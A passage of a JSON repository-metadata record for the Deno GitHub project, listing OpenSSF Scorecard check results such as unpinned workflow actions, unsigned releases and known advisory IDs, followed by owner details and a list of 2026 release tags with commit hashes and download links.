patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_